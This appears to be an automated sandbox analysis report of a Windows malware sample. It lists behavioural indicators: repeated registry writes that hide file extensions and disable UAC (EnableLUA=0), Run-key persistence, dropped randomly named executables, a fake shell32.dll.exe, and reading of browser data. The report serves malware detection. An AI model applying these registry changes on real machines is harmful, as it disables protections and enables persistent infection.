| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Renames multiple (77) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\nWIcMoMM\teoAYYww.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\nWIcMoMM\teoAYYww.exe | N/A |
| N/A | N/A | C:\ProgramData\UsMEMkgo\KWgYYckw.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\teoAYYww.exe = "C:\\Users\\Admin\\nWIcMoMM\\teoAYYww.exe" | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\KWgYYckw.exe = "C:\\ProgramData\\UsMEMkgo\\KWgYYckw.exe" | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\teoAYYww.exe = "C:\\Users\\Admin\\nWIcMoMM\\teoAYYww.exe" | C:\Users\Admin\nWIcMoMM\teoAYYww.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\KWgYYckw.exe = "C:\\ProgramData\\UsMEMkgo\\KWgYYckw.exe" | C:\ProgramData\UsMEMkgo\KWgYYckw.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eQAkQcoo.exe = "C:\\Users\\Admin\\YGoswEoY\\eQAkQcoo.exe" | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Veokogws.exe = "C:\\ProgramData\\qIgcssEE\\Veokogws.exe" | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\shell32.dll.exe | C:\Users\Admin\nWIcMoMM\teoAYYww.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\shell32.dll.exe | C:\Users\Admin\nWIcMoMM\teoAYYww.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\YGoswEoY\eQAkQcoo.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\qIgcssEE\Veokogws.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
